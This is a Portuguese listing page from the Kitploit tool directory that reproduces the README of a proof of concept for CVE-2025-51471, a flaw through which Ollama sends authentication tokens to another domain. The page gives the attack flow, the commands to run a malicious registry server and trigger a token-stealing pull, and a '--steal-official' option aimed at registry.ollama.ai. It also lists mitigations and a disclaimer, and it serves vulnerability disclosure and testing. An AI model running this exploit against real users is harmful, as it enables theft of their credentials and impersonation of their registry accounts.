Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-51471-POC — Este PoC é apenas para fins educacionais e de testes de segurança autorizados. NÃO use contra sistemas que você não possui. | Kitploit
Ferramentas/GitHubGitHub/ajtazer/cve-2025-51471-poc
Análise de VulnerabilidadesExploraçãoSegurança WebAutenticaçãoRed Teaming
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

Este PoC é apenas para fins educacionais e de testes de segurança autorizados. NÃO use contra sistemas que você não possui.

Ver Repositório
22há 8 mesesAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-51471 - Prova de Conceito de Exposição de Token entre Domínios do Ollama

CVE-2025-51471 Ollama CVSS

Autor: ajtazer

🔥 Visão Geral

Este repositório contém uma Prova de Conceito (PoC) para CVE-2025-51471, uma vulnerabilidade de Exposição de Token de Autenticação entre Domínios que afeta todas as versões do Ollama (incluindo as mais recentes).

📋 Descrição da Vulnerabilidade

Quando o Ollama baixa um modelo de um servidor HTTPS que responde com 401 Unauthorized, ele segue a URL realm do cabeçalho WWW-Authenticate [...]

sem validar se ela pertence ao mesmo domínio

Isso permite que um atacante:

  1. Configure um servidor "registry" malicioso
  2. Engane um usuário para que ele baixe um modelo desse servidor
  3. Retorne uma resposta 401 com um cabeçalho WWW-Authenticate apontando para um endpoint controlado pelo atacante
  4. O Ollama envia cegamente seu token de autenticação assinado com Ed25519 para o atacante
  5. O atacante captura o token

Impacto

  • Acesse modelos privados em registry.ollama.ai
  • Envie modelos maliciosos sob a identidade da vítima
  • Assuma a identidade da vítima no registry do Ollama

🚀 Início Rápido

Pré-requisitos

  • Python 3.7+
  • Flask (pip install flask)
  • Ollama (qualquer versão)

Instalação

root@kitploit:~
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask

Executando a PoC

  1. Inicie o servidor registry malicioso (modo HTTP):
root@kitploit:~
python3 malicious_registry.py --no-ssl
  1. Em outro terminal, certifique-se de que o Ollama esteja em execução:
root@kitploit:~
ollama serve
  1. Acione a vulnerabilidade:
root@kitploit:~
# Using curl API
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# OR using ollama CLI
ollama pull --insecure localhost:8080/malicious/model
  1. Observe o terminal do servidor para ver os tokens capturados!

🎬 Demonstração (Vídeo da PoC)

Demonstrei esta PoC em um vídeo curto — assista aqui:

YouTube — Demonstração da PoC

Nota (modo HTTPS no macOS): Se você estiver usando o modo HTTPS, adicione o certificado gerado ao seu keychain ou use o modo HTTP com --no-ssl.

📖 Opções de Uso

root@kitploit:~
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Options:
  --port, -p PORT       Port to listen on (default: 8080)
  --no-ssl              Use HTTP instead of HTTPS
  --steal-official, -s  Redirect to steal registry.ollama.ai tokens
  --no-verbose          Disable verbose output

🔧 Endpoints da API

EndpointDescrição
/v2/*Endpoint de registry falso (dispara o exploit)
/v2/tokenEndpoint de captura de token
/tokensVisualizar todos os tokens capturados (JSON)
/healthVerificação de integridade do servidor

🛡️ Mitigação

  1. Baixe modelos apenas de fontes confiáveis
  2. Tenha cautela ao baixar modelos de registries de terceiros
  3. Consulte a PR #10750 para a correção oficial

📝 Créditos

  • Autor: ajtazer
  • Pesquisadores Originais:
    • Mohammed Benhelli (@FuzzingLabs)
    • Patrick Ventuzelo (@FuzzingLabs)
    • Relatório Huntr

⚠️ Aviso Legal

Esta PoC é apenas para fins de teste de segurança educacional e autorizado. NÃO a utilize contra sistemas que você não possui.


Feito com ❤️ usando Antigravity

Baixar ferramenta